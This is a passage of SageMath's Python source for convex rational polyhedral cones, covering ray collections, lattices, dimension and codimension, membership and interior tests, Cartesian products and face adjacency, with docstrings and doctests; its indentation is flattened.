sage: v = vector([1,0])
sage: v.set_immutable()
sage: c = IntegralRayCollection([v], ZZ^2)
sage: c = IntegralRayCollection([v], None)
sage: c.lattice() # Determined automatically
Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: c.rays()
(1, 0)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: TestSuite(c).run()
"""
if lattice is None:
lattice = rays[0].parent()
self._rays = PointCollection(rays, lattice)
self._lattice = lattice
def __richcmp__(self, right, op):
r"""
Compare ``self`` and ``right``.
INPUT:
- ``right`` -- anything.
OUTPUT:
boolean
There is equality if ``right`` is of the same type as
``self``, they have the same ambient lattices, and their
rays are the same and listed in the same order.
TESTS::
sage: c1 = Cone([(1,0), (0,1)])
sage: c2 = Cone([(0,1), (1,0)])
sage: c3 = Cone([(0,1), (1,0)])
sage: c1 > c2
True
sage: c2 < c1
True
sage: c2 == c3
True
sage: c2 is c3
False
"""
if type(self) != type(right):
return NotImplemented
# We probably do need to have explicit comparison of lattices here
# since if one of the collections does not live in a toric lattice,
# comparison of rays may miss the difference.
return richcmp((self.lattice(), self.rays()),
(right.lattice(), right.rays()), op)
def __hash__(self):
r"""
Return the hash of ``self`` computed from rays.
OUTPUT:
- integer.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: hash(c) == hash(c)
True
"""
if "_hash" not in self.__dict__:
self._hash = hash(self._rays)
return self._hash
def __iter__(self):
r"""
Return an iterator over rays of ``self``.
OUTPUT:
- iterator.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: for ray in c: print(ray)
N(1, 0)
N(0, 1)
"""
return iter(self._rays)
def cartesian_product(self, other, lattice=None):
r"""
Return the Cartesian product of ``self`` with ``other``.
INPUT:
- ``other`` -- an :class:`IntegralRayCollection`;
- ``lattice`` -- (optional) the ambient lattice for the result. By
default, the direct sum of the ambient lattices of ``self`` and
``other`` is constructed.
OUTPUT:
- an :class:`IntegralRayCollection`.
By the Cartesian product of ray collections `(r_0, \dots, r_{n-1})` and
`(s_0, \dots, s_{m-1})` we understand the ray collection of the form
`((r_0, 0), \dots, (r_{n-1}, 0), (0, s_0), \dots, (0, s_{m-1}))`, which
is suitable for Cartesian products of cones and fans. The ray order is
guaranteed to be as described.
EXAMPLES::
sage: c = Cone([(1,)])
sage: c.cartesian_product(c) # indirect doctest
2-d cone in 2-d lattice N+N
sage: _.rays()
N+N(1, 0),
N+N(0, 1)
in 2-d lattice N+N
"""
assert isinstance(other, IntegralRayCollection)
if lattice is None:
lattice = self.lattice().direct_sum(other.lattice())
suffix = [0] * other.lattice_dim()
rays = [lattice(list(r1) + suffix) for r1 in self.rays()]
prefix = [0] * self.lattice_dim()
rays.extend(lattice(prefix + list(r2)) for r2 in other.rays())
for r in rays:
r.set_immutable()
return IntegralRayCollection(rays, lattice)
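# Sketch of the ray layout used above (comments only): if ``self`` lives in an
# a-dimensional lattice and ``other`` in a b-dimensional one, each ray r of
# ``self`` becomes (r, 0, ..., 0) with b trailing zeros and each ray s of
# ``other`` becomes (0, ..., 0, s) with a leading zeros, in that order.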
def __neg__(self):
"""
Return the collection with opposite rays.
EXAMPLES::
sage: c = Cone([(1,1),(0,1)]); c
2-d cone in 2-d lattice N
sage: d = -c # indirect doctest
sage: d.rays()
N(-1, -1),
N( 0, -1)
in 2-d lattice N
"""
lattice = self.lattice()
rays = [-r1 for r1 in self.rays()]
for r in rays:
r.set_immutable()
return IntegralRayCollection(rays, lattice)
def dim(self):
r"""
Return the dimension of the subspace spanned by rays of ``self``.
OUTPUT:
- integer.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.lattice_dim()
2
sage: c.dim()
1
"""
if "_dim" not in self.__dict__:
self._dim = self.rays().matrix().rank()
return self._dim
def lattice(self):
r"""
Return the ambient lattice of ``self``.
OUTPUT:
- lattice.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.lattice()
2-d lattice N
sage: Cone([], ZZ^3).lattice()
Ambient free module of rank 3
over the principal ideal domain Integer Ring
"""
return self._lattice
def ambient_vector_space(self, base_field=None):
r"""
Return the ambient vector space.
It is the ambient lattice (:meth:`lattice`) tensored with a field.
INPUT:
- ``base_field`` -- (default: the rationals) a field.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.ambient_vector_space()
Vector space of dimension 2 over Rational Field
sage: c.ambient_vector_space(AA)
Vector space of dimension 2 over Algebraic Real Field
"""
return self.lattice().vector_space(base_field=base_field)
@cached_method
def dual_lattice(self):
r"""
Return the dual of the ambient lattice of ``self``.
OUTPUT:
- lattice. If possible (that is, if :meth:`lattice` has a
``dual()`` method), the dual lattice is returned. Otherwise,
`\ZZ^n` is returned, where `n` is the dimension of :meth:`lattice`.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.dual_lattice()
2-d lattice M
sage: Cone([], ZZ^3).dual_lattice()
Ambient free module of rank 3
over the principal ideal domain Integer Ring
TESTS:
The dual lattice of the dual lattice of a random cone should be
the original lattice::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.dual_lattice().dual() is K.lattice()
True
"""
try:
return self.lattice().dual()
except AttributeError:
return ZZ**self.lattice_dim()
def lattice_dim(self):
r"""
Return the dimension of the ambient lattice of ``self``.
An alias is :meth:`ambient_dim`.
OUTPUT:
- integer.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.lattice_dim()
2
sage: c.dim()
1
"""
return self.lattice().dimension()
ambient_dim = lattice_dim
def nrays(self):
r"""
Return the number of rays of ``self``.
OUTPUT:
- integer.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.nrays()
2
"""
return len(self._rays)
def plot(self, **options):
r"""
Plot ``self``.
INPUT:
- any options for toric plots (see :func:`toric_plotter.options
<sage.geometry.toric_plotter.options>`), none are mandatory.
OUTPUT:
- a plot.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.plot() # optional - sage.plot
Graphics object consisting of 9 graphics primitives
"""
tp = ToricPlotter(options, self.lattice().degree(), self.rays())
return tp.plot_lattice() + tp.plot_rays() + tp.plot_generators()
def ray(self, n):
r"""
Return the ``n``-th ray of ``self``.
INPUT:
- ``n`` -- integer, an index of a ray of ``self``. Enumeration of rays
starts with zero.
OUTPUT:
- ray, an element of the lattice of ``self``.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.ray(0)
N(1, 0)
"""
return self._rays[n]
def rays(self, *args):
r"""
Return (some of the) rays of ``self``.
INPUT:
- ``ray_list`` -- a list of integers, the indices of the requested
rays. If not specified, all rays of ``self`` will be returned.
OUTPUT:
- a :class:`~sage.geometry.point_collection.PointCollection`
of primitive integral ray generators.
EXAMPLES::
sage: c = Cone([(1,0), (0,1), (-1, 0)])
sage: c.rays()
N( 0, 1),
N( 1, 0),
N(-1, 0)
in 2-d lattice N
sage: c.rays([0, 2])
N( 0, 1),
N(-1, 0)
in 2-d lattice N
You can also give ray indices directly, without packing them into a
list::
sage: c.rays(0, 2)
N( 0, 1),
N(-1, 0)
in 2-d lattice N
"""
return self._rays if not args else self._rays(*args)
def codim(self):
r"""
Return the codimension of ``self``.
The codimension of a collection of rays (of a cone/fan) is the
difference between the dimension of the ambient space and the
dimension of the subspace spanned by those rays (of the cone/fan).
OUTPUT:
A nonnegative integer representing the codimension of ``self``.
.. SEEALSO::
:meth:`dim`, :meth:`lattice_dim`
EXAMPLES:
The codimension of the nonnegative orthant is zero, since the
span of its generators equals the entire ambient space::
sage: K = cones.nonnegative_orthant(3)
sage: K.codim()
0
However, if we remove a ray so that the entire cone is contained
within the `x`-`y` plane, then the resulting cone will have
codimension one, because the `z`-axis is perpendicular to every
element of the cone::
sage: K = Cone([(1,0,0), (0,1,0)])
sage: K.codim()
1
If our cone is all of `\mathbb{R}^{2}`, then its codimension is
zero::
sage: K = Cone([(1,0), (-1,0), (0,1), (0,-1)])
sage: K.is_full_space()
True
sage: K.codim()
0
And if the cone is trivial in any space, then its codimension is
equal to the dimension of the ambient space::
sage: K = cones.trivial(0)
sage: K.lattice_dim()
0
sage: K.codim()
0
sage: K = cones.trivial(1)
sage: K.lattice_dim()
1
sage: K.codim()
1
sage: K = cones.trivial(2)
sage: K.lattice_dim()
2
sage: K.codim()
2
TESTS:
The codimension of a cone should be an integer between zero and
the dimension of the ambient space, inclusive::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: c = K.codim()
sage: c in ZZ
True
sage: 0 <= c <= K.lattice_dim()
True
A solid cone should have codimension zero::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8, solid = True)
sage: K.codim()
0
The codimension of a cone is equal to the lineality of its dual::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: K.codim() == K.dual().lineality()
True
"""
# same as ConvexSet_base.codim; the main point is the much more detailed
# docstring.
return (self.lattice_dim() - self.dim())
codimension = codim
def span(self, base_ring=None):
r"""
Return the span of ``self``.
INPUT:
- ``base_ring`` -- (default: from lattice) the base ring to use
for the generated module.
OUTPUT:
A module spanned by the generators of ``self``.
EXAMPLES:
The span of a single ray is a one-dimensional sublattice::
sage: K1 = Cone([(1,)])
sage: K1.span()
Sublattice <N(1)>
sage: K2 = Cone([(1,0)])
sage: K2.span()
Sublattice <N(1, 0)>
The span of the nonnegative orthant is the entire ambient lattice::
sage: K = cones.nonnegative_orthant(3)
sage: K.span() == K.lattice()
True
By specifying a ``base_ring``, we can obtain a vector space::
sage: K = Cone([(1,0,0),(0,1,0),(0,0,1)])
sage: K.span(base_ring=QQ)
Vector space of degree 3 and dimension 3 over Rational Field
Basis matrix:
[1 0 0]
[0 1 0]
[0 0 1]
TESTS:
We can take the span of the trivial cone::
sage: cones.trivial(0).span()
Sublattice <>
The span of a solid cone is the entire ambient space::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, max_rays=8, solid=True)
sage: K.span().vector_space() == K.lattice().vector_space()
True
"""
L = self.lattice()
if base_ring is None:
base_ring = L.base_ring()
return L.span(self, base_ring)
def classify_cone_2d(ray0, ray1, check=True):
r"""
Return `(d,k)` classifying the lattice cone spanned by the two rays.
INPUT:
- ``ray0``, ``ray1`` -- two primitive integer vectors. The
generators of the two rays generating the two-dimensional cone.
- ``check`` -- boolean (default: ``True``). Whether to check the
input rays for consistency.
OUTPUT:
A pair `(d,k)` of integers classifying the cone up to `GL(2, \ZZ)`
equivalence. See Proposition 10.1.1 of [CLS2011]_ for the
definition. We return the unique `(d,k)` with minimal `k`, see
Proposition 10.1.3 of [CLS2011]_.
EXAMPLES::
sage: ray0 = vector([1,0])
sage: ray1 = vector([2,3])
sage: from sage.geometry.cone import classify_cone_2d
sage: classify_cone_2d(ray0, ray1)
(3, 2)
sage: ray0 = vector([2,4,5])
sage: ray1 = vector([5,19,11])
sage: classify_cone_2d(ray0, ray1)
(3, 1)
sage: m = matrix(ZZ, [(19, -14, -115), (-2, 5, 25), (43, -42, -298)])
sage: m.det() # check that it is in GL(3,ZZ)
-1
sage: classify_cone_2d(m*ray0, m*ray1)
(3, 1)
TESTS:
Check using the connection between the Hilbert basis of the cone
spanned by the two rays (in arbitrary dimension) and the
Hirzebruch-Jung continued fraction expansion, see Chapter 10 of
[CLS2011]_ ::
sage: from sage.geometry.cone import normalize_rays
sage: for i in range(10):
....: ray0 = random_vector(ZZ, 3)
....: ray1 = random_vector(ZZ, 3)
....: if ray0.is_zero() or ray1.is_zero(): continue
....: ray0, ray1 = normalize_rays([ray0, ray1], ZZ^3)
....: d, k = classify_cone_2d(ray0, ray1, check=True)
....: assert (d,k) == classify_cone_2d(ray1, ray0)
....: if d == 0: continue
....: frac = (k/d).continued_fraction_list("hj")
....: if len(frac)>100: continue # avoid expensive computation
....: hilb = Cone([ray0, ray1]).Hilbert_basis()
....: assert len(hilb) == len(frac) + 1
"""
if check:
assert ray0.parent() is ray1.parent()
assert ray0.base_ring() is ZZ
assert gcd(ray0) == 1
assert gcd(ray1) == 1
assert not ray0.is_zero() and not ray1.is_zero()
m = matrix([ray0, ray1]) # dim(ray) x 2 matrix
basis = m.saturation().solve_left(m) # 2-d basis for the span of the cone
basis = basis.change_ring(ZZ).transpose()
if basis.nrows() < 2:
d = 0
k = basis[0,1]
else:
basis.echelonize() # columns are the "cone normal form"
d = basis[1,1]
k = basis[0,1]
if check:
if d == 0: # degenerate cone
assert basis[0,0] == 1
assert k == -1 or k == +1
else: # non-degenerate cone
assert basis[0,0] == 1 and basis[1,0] == 0
assert d > 0
assert 0 <= k < d
assert gcd(d,k) == 1
# compute unique k, see Proposition 10.1.3 of [CLS2011]
if d > 0:
for ktilde in range(k):
if (k*ktilde) % d == 1:
k = ktilde
break
return (d,k)
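# Worked example (comments only): for ray0 = (1, 0) and ray1 = (2, 3) the
# echelonized basis matrix works out to [[1, 2], [0, 3]], so d = 3 and the raw
# k is 2.  Since 2*2 == 1 (mod 3), no smaller ktilde in range(k) satisfies
# k*ktilde == 1 (mod d), and the returned pair is (3, 2) as in the EXAMPLES.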
# Derived classes MUST allow construction of their objects using ``ambient``
# and ``ambient_ray_indices`` keyword parameters. See ``intersection`` method
# for an example why this is needed.
@richcmp_method
class ConvexRationalPolyhedralCone(IntegralRayCollection, Container, ConvexSet_closed, sage.geometry.abc.ConvexRationalPolyhedralCone):
r"""
Create a convex rational polyhedral cone.
.. WARNING::
This class does not perform any checks of correctness of input nor
does it convert input into the standard representation. Use
:func:`Cone` to construct cones.
Cones are immutable, but they cache most of the returned values.
INPUT:
The input can be either:
- ``rays`` -- list of immutable primitive vectors in ``lattice``;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If ``None``, it will be determined
as :func:`parent` of the first ray. Of course, this cannot be done if
there are no rays, so in this case you must give an appropriate
``lattice`` directly.
or (these parameters must be given as keywords):
- ``ambient`` -- ambient structure of this cone, a bigger :class:`cone
<ConvexRationalPolyhedralCone>` or a :class:`fan
<sage.geometry.fan.RationalPolyhedralFan>`, this cone *must be a face
of* ``ambient``;
- ``ambient_ray_indices`` -- increasing list or tuple of integers, indices
of rays of ``ambient`` generating this cone.
In both cases, the following keyword parameter may be specified in addition:
- ``PPL`` -- either ``None`` (default) or a
:class:`~ppl.polyhedron.C_Polyhedron` representing the cone. This
serves only to cache the polyhedral data if you know it
already. The constructor does not make a copy so the ``PPL`` object
should not be modified afterwards.
OUTPUT:
- convex rational polyhedral cone.
.. NOTE::
Every cone has its ambient structure. If it was not specified, it is
this cone itself.
"""
def __init__(self, rays=None, lattice=None,
ambient=None, ambient_ray_indices=None, PPL=None):
r"""
See :class:`ConvexRationalPolyhedralCone` for documentation.
TESTS::
sage: from sage.geometry.cone import (
....: ConvexRationalPolyhedralCone)
sage: v1 = vector([1,0])
sage: v2 = vector([0,1])
sage: v1.set_immutable()
sage: v2.set_immutable()
sage: ac = ConvexRationalPolyhedralCone([v1, v2], ZZ^2)
sage: ac = ConvexRationalPolyhedralCone([v1, v2], None)
sage: ac.lattice() # Determined automatically
Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: ac.rays()
(1, 0),
(0, 1)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: ac.ambient() is ac
True
sage: TestSuite(ac).run()
sage: sc = ConvexRationalPolyhedralCone(ambient=ac,
....: ambient_ray_indices=[1])
sage: sc.rays()
(0, 1)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: sc.ambient() is ac
True
sage: TestSuite(sc).run()
"""
superinit = super(ConvexRationalPolyhedralCone, self).__init__
if ambient is None:
superinit(rays, lattice)
self._ambient = self
self._ambient_ray_indices = tuple(range(self.nrays()))
else:
self._ambient = ambient
self._ambient_ray_indices = tuple(ambient_ray_indices)
superinit(ambient.rays(self._ambient_ray_indices),
ambient.lattice())
if PPL is not None:
self._PPL_C_Polyhedron = PPL
def _sage_input_(self, sib, coerced):
"""
Return Sage command to reconstruct ``self``.
See :mod:`sage.misc.sage_input` for details.
EXAMPLES::
sage: cone = Cone([(1,0), (1,1)])
sage: sage_input(cone)
Cone([(1, 0), (1, 1)])
"""
return sib.name('Cone')([sib(tuple(r)) for r in self.rays()])
def _PPL_cone(self):
r"""
Return the Parma Polyhedra Library (PPL) representation of the cone.
OUTPUT:
A :class:`~ppl.polyhedron.C_Polyhedron` representing the cone.
EXAMPLES::
sage: c = Cone([(1,0), (1,1), (0,1)])
sage: c._PPL_cone()
A 2-dimensional polyhedron in QQ^2 defined as
the convex hull of 1 point, 2 rays
sage: c._PPL_cone().minimized_generators()
Generator_System {point(0/1, 0/1), ray(0, 1), ray(1, 0)}
sage: c._PPL_cone().minimized_constraints()
Constraint_System {x1>=0, x0>=0}
TESTS:
There are no empty cones, the origin always belongs to them::
sage: Cone([(0,0)])._PPL_cone()
A 0-dimensional polyhedron in QQ^2
defined as the convex hull of 1 point
sage: cones.trivial(2)._PPL_cone()
A 0-dimensional polyhedron in QQ^2
defined as the convex hull of 1 point
"""
if "_PPL_C_Polyhedron" not in self.__dict__:
gs = Generator_System(
PPL_point(Linear_Expression(self._lattice(0), 0)))
for r in self.rays():
gs.insert( PPL_ray(Linear_Expression(r,0)) )
self._PPL_C_Polyhedron = C_Polyhedron(gs)
return self._PPL_C_Polyhedron
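# Illustrative note (comments only): for the quadrant Cone([(1,0), (0,1)]) the
# generator system built above consists of the origin point plus one PPL ray
# per generating ray, which PPL prints as
# Generator_System {point(0/1, 0/1), ray(0, 1), ray(1, 0)},
# exactly as shown in the EXAMPLES block of this method.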
def __contains__(self, point):
r"""
Check if ``point`` is contained in ``self``.
See :meth:`_contains` (which is called by this function) for
documentation.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: (1,1) in c
True
sage: [1,1] in c
True
sage: (-1,0) in c
False
"""
return self._contains(point)
def __getstate__(self):
r"""
Return the dictionary that should be pickled.
OUTPUT:
- :class:`dict`.
TESTS::
sage: C = Cone([(1,0)])
sage: C.face_lattice()
Finite lattice containing 2 elements with distinguished linear extension
sage: C._test_pickling()
sage: C2 = loads(dumps(C)); C2
1-d cone in 2-d lattice N
sage: C2 == C
True
sage: C2 is C # Is this desirable?
False
"""
state = copy(self.__dict__)
state.pop("_PPL_C_Polyhedron", None) # PPL is not picklable.
# TODO: do we want to keep the face lattice in the pickle?
# Currently there is an unpickling loop if we do:
# Unpickling a cone C requires first to unpickle its face lattice.
# The latter is a Poset which takes C among its arguments. Due
# to UniqueRepresentation, this triggers a call to hash(C) which
# itself depends on the attribute C._rays which have not yet
# been unpickled. See ``explain_pickle(dumps(C))``.
state.pop("_face_lattice", None)
return state
def _contains(self, point, region='whole cone'):
r"""
Check if ``point`` is contained in ``self``.
This function is called by :meth:`__contains__` and :meth:`contains`
to ensure the same call depth for warning messages.
By default, a point on the boundary of the cone is considered
part of the cone. If you want to test whether the
**interior** of the cone contains the point, you need to pass
the optional argument ``'interior'``. If you want to test
whether the **relative interior** of the cone contains the
point, you need to pass the optional argument
``'relative_interior'``.
.. WARNING::
The boundary of a closed convex cone is determined by a
set of inequalities. If your ``point`` has entries in an
inexact ring, it will sometimes be impossible to say (with
confidence) if that point lies on the boundary of the cone
or slightly inside it.
INPUT:
- ``point`` -- anything; an attempt will be made to convert it
into an element compatible with the ambient space of ``self``.
- ``region`` -- a string (default: 'whole cone'); can be
either 'whole cone', 'interior', or 'relative interior'.
OUTPUT:
``True`` is returned if ``point`` is contained in the
specified ``region`` of ``self``. ``False`` is returned
otherwise, in particular when ``point`` is incompatible with
the ambient space.
A ``ValueError`` is raised if ``region`` is not one of the
three allowed values.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains((1,1))
True
We can test vectors with irrational components::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains((1,sqrt(2)))
True
sage: c._contains(vector(SR, [1,pi]))
True
Ensure that complex vectors are not contained in a real cone::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains((1,I))
False
sage: c._contains(vector(QQbar,[1,I]))
False
And we refuse to coerce elements of another lattice into ours::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains(c.dual().ray(0))
False
"""
try:
point = _ambient_space_point(self, point)
except TypeError as ex:
if str(ex).endswith("have incompatible lattices"):
warn("you have checked if a cone contains a point "
"from an incompatible lattice, this is False!",
stacklevel=3)
return False
if region not in ("whole cone", "relative interior", "interior"):
raise ValueError("%s is an unknown region of the cone!" % region)
if region == "interior" and self.dim() < self.lattice_dim():
return False
need_strict = region.endswith("interior")
M = self.dual_lattice()
for c in self._PPL_cone().minimized_constraints():
pr = M(c.coefficients()) * point
if c.is_equality():
if pr != 0:
return False
elif pr < 0 or need_strict and pr == 0:
return False
return True
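# Sketch of the membership test above (comments only): the point is paired, via
# the dual lattice, with each minimized PPL constraint.  For the quadrant
# Cone([(1,0), (0,1)]) the constraints are x0 >= 0 and x1 >= 0, so the point
# (1, 0) satisfies both and lies in the whole cone, but it saturates x1 >= 0
# and is therefore rejected when ``region`` is 'interior' or 'relative interior'.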
def interior_contains(self, *args):
r"""
Check if a given point is contained in the interior of ``self``.
For a cone of strictly lower dimension than the ambient space,
the interior is always empty. You probably want to use
:meth:`relative_interior_contains` in this case.
INPUT:
- anything. An attempt will be made to convert all arguments into a
single element of the ambient space of ``self``. If it fails,
``False`` will be returned.
OUTPUT:
- ``True`` if the given point is contained in the interior of
``self``, ``False`` otherwise.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.contains((1,1))
True
sage: c.interior_contains((1,1))
True
sage: c.contains((1,0))
True
sage: c.interior_contains((1,0))
False
"""
point = flatten(args)
if len(point) == 1:
point = point[0]
return self._contains(point, 'interior')
@cached_method
def interior(self):
r"""
Return the interior of ``self``.
OUTPUT:
- either ``self``, an empty polyhedron, or an instance of
:class:`~sage.geometry.relative_interior.RelativeInterior`.
EXAMPLES::
sage: c = Cone([(1,0,0), (0,1,0)]); c
2-d cone in 3-d lattice N
sage: c.interior()
The empty polyhedron in ZZ^3
sage: origin = cones.trivial(2); origin
0-d cone in 2-d lattice N
sage: origin.interior()
The empty polyhedron in ZZ^2
sage: K = cones.nonnegative_orthant(2); K
2-d cone in 2-d lattice N
sage: K.interior()
Relative interior of 2-d cone in 2-d lattice N
sage: K2 = Cone([(1,0),(-1,0),(0,1),(0,-1)]); K2
2-d cone in 2-d lattice N
sage: K2.interior() is K2
True
"""
if self.is_solid():
return self.relative_interior()
return Polyhedron(ambient_dim=self.lattice_dim())
def relative_interior_contains(self, *args):
r"""
Check if a given point is contained in the relative interior of ``self``.
For a full-dimensional cone the relative interior is simply
the interior, so this method will do the same check as
:meth:`interior_contains`. For a strictly lower-dimensional cone, the
relative interior is the cone without its facets.
INPUT:
- anything. An attempt will be made to convert all arguments into a
single element of the ambient space of ``self``. If it fails,
``False`` will be returned.
OUTPUT:
- ``True`` if the given point is contained in the relative
interior of ``self``, ``False`` otherwise.
EXAMPLES::
sage: c = Cone([(1,0,0), (0,1,0)])
sage: c.contains((1,1,0))
True
sage: c.relative_interior_contains((1,1,0))
True
sage: c.interior_contains((1,1,0))
False
sage: c.contains((1,0,0))
True
sage: c.relative_interior_contains((1,0,0))
False
sage: c.interior_contains((1,0,0))
False
"""
point = flatten(args)
if len(point) == 1:
point = point[0]
return self._contains(point, 'relative interior')
@cached_method
def relative_interior(self):
r"""
Return the relative interior of ``self``.
OUTPUT:
- either ``self`` or an instance of
:class:`~sage.geometry.relative_interior.RelativeInterior`.
EXAMPLES::
sage: c = Cone([(1,0,0), (0,1,0)]); c
2-d cone in 3-d lattice N
sage: c.relative_interior()
Relative interior of 2-d cone in 3-d lattice N
sage: origin = cones.trivial(2); origin
0-d cone in 2-d lattice N
sage: origin.relative_interior() is origin
True
sage: K1 = Cone([(1,0), (-1,0)]); K1
1-d cone in 2-d lattice N
sage: K1.relative_interior() is K1
True
sage: K2 = Cone([(1,0),(-1,0),(0,1),(0,-1)]); K2
2-d cone in 2-d lattice N
sage: K2.relative_interior() is K2
True
"""
if self.is_relatively_open():
return self
return RelativeInterior(self)
def cartesian_product(self, other, lattice=None):
r"""
Return the Cartesian product of ``self`` with ``other``.
INPUT:
- ``other`` -- a :class:`cone <ConvexRationalPolyhedralCone>`;
- ``lattice`` -- (optional) the ambient lattice for the
Cartesian product cone. By default, the direct sum of the
ambient lattices of ``self`` and ``other`` is constructed.
OUTPUT:
- a :class:`cone <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: c = Cone([(1,)])
sage: c.cartesian_product(c)
2-d cone in 2-d lattice N+N
sage: _.rays()
N+N(1, 0),
N+N(0, 1)
in 2-d lattice N+N
"""
assert is_Cone(other)
rc = super(ConvexRationalPolyhedralCone, self).cartesian_product(
other, lattice)
return ConvexRationalPolyhedralCone(rc.rays(), rc.lattice())
def __neg__(self):
"""
Return the cone with opposite rays.
OUTPUT:
- a :class:`cone <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: c = Cone([(1,1),(0,1)]); c
2-d cone in 2-d lattice N
sage: d = -c; d # indirect doctest
2-d cone in 2-d lattice N
sage: -d == c
True
sage: d.rays()
N(-1, -1),
N( 0, -1)
in 2-d lattice N
"""
rc = super(ConvexRationalPolyhedralCone, self).__neg__()
return ConvexRationalPolyhedralCone(rc.rays(), rc.lattice())
def __richcmp__(self, right, op):
r"""
Compare ``self`` and ``right``.
INPUT:
- ``right`` -- anything.
OUTPUT:
boolean
There is equality if ``self`` and ``right`` are cones of any
kind in the same lattice with the same rays listed in the
same order.
TESTS::
sage: c1 = Cone([(1,0), (0,1)])
sage: c2 = Cone([(0,1), (1,0)])
sage: c3 = Cone([(0,1), (1,0)])
sage: c1 > c2
True
sage: c2 < c1
True
sage: c2 == c3
True
sage: c2 is c3
False
"""
if is_Cone(right):
# We don't care about particular type of right in this case
return richcmp((self.lattice(), self.rays()),
(right.lattice(), right.rays()), op)
else:
return NotImplemented
def _latex_(self):
r"""
Return a LaTeX representation of ``self``.
OUTPUT:
- string.
TESTS::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant._latex_()
'\\sigma^{2}'
sage: quadrant.facets()[0]._latex_()
'\\sigma^{1} \\subset \\sigma^{2}'
"""
if self.ambient() is self:
return r"\sigma^{%d}" % self.dim()
else:
return r"\sigma^{%d} \subset %s" % (self.dim(),
latex(self.ambient()))
def _repr_(self):
r"""
Return a string representation of ``self``.
OUTPUT:
- string.
TESTS::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant._repr_()
'2-d cone in 2-d lattice N'
sage: quadrant
2-d cone in 2-d lattice N
sage: quadrant.facets()[0]
1-d face of 2-d cone in 2-d lattice N
"""
result = "%d-d" % self.dim()
if self.ambient() is self:
result += " cone in"
if is_ToricLattice(self.lattice()):
result += " %s" % self.lattice()
else:
result += " %d-d lattice" % self.lattice_dim()
else:
result += " face of %s" % self.ambient()
return result
def _some_elements_(self):
r"""
Generate some points of ``self``.
EXAMPLES::
sage: K = cones.nonnegative_orthant(3)
sage: K.some_elements() # indirect doctest
[(0, 0, 0), (1/2, 0, 0), (1/4, 1/2, 0), (1/8, 1/4, 1/2)]
"""
V = self.ambient_vector_space()
r_iter = iter(self._rays)
p = V(0)
yield p
for i in range(5):
try:
p = (p + next(r_iter)) / 2
except StopIteration:
return
yield p
def _sort_faces(self, faces):
r"""
Return sorted (if necessary) ``faces`` as a tuple.
This function ensures that one-dimensional faces are listed in
agreement with the order of corresponding rays and facets with
facet normals.
INPUT:
- ``faces`` -- iterable of :class:`cones
<ConvexRationalPolyhedralCone>`.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
TESTS::
sage: octant = Cone(identity_matrix(3).columns())
sage: # indirect doctest
sage: for i, face in enumerate(octant.faces(1)):
....: if face.ray(0) != octant.ray(i):
....: print("Wrong order!")
"""
faces = tuple(faces)
if len(faces) > 1: # Otherwise there is nothing to sort
if faces[0].nrays() == 1:
faces = tuple(sorted(faces,
key=lambda f: f._ambient_ray_indices))
elif faces[0].dim() == self.dim() - 1 and \
self.facet_normals.is_in_cache():
# If we already have facet normals, sort according to them
faces = set(faces)
sorted_faces = [None] * len(faces)
for i, n in enumerate(self.facet_normals()):
for f in faces:
if n*f.rays() == 0:
sorted_faces[i] = f
faces.remove(f)
break
faces = tuple(sorted_faces)
return faces
@cached_method
def adjacent(self):
r"""
Return faces adjacent to ``self`` in the ambient face lattice.
Two *distinct* faces `F_1` and `F_2` of the same face lattice are
**adjacent** if all of the following conditions hold:
* `F_1` and `F_2` have the same dimension `d`;
* `F_1` and `F_2` share a facet of dimension `d-1`;
* `F_1` and `F_2` are facets of some face of dimension `d+1`, unless
`d` is the dimension of the ambient structure.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.adjacent()
()
sage: one_face = octant.faces(1)[0]
sage: len(one_face.adjacent())
2
sage: one_face.adjacent()[1]
1-d face of 3-d cone in 3-d lattice N
Things are a little bit subtle with fans, as we illustrate below.
First, we create a fan from two cones in the plane::
sage: fan = Fan(cones=[(0,1), (1,2)],
....: rays=[(1,0), (0,1), (-1,0)])
sage: cone = fan.generating_cone(0)
sage: len(cone.adjacent())
1
The second generating cone is adjacent to this one. Now we create the
same fan, but embedded into the 3-dimensional space::
sage: fan = Fan(cones=[(0,1), (1,2)],
....: rays=[(1,0,0), (0,1,0), (-1,0,0)])
sage: cone = fan.generating_cone(0)
sage: len(cone.adjacent())
1
The result is as before, since we still have::
sage: fan.dim()
2
Now we add another cone to make the fan 3-dimensional::
sage: fan = Fan(cones=[(0,1), (1,2), (3,)],
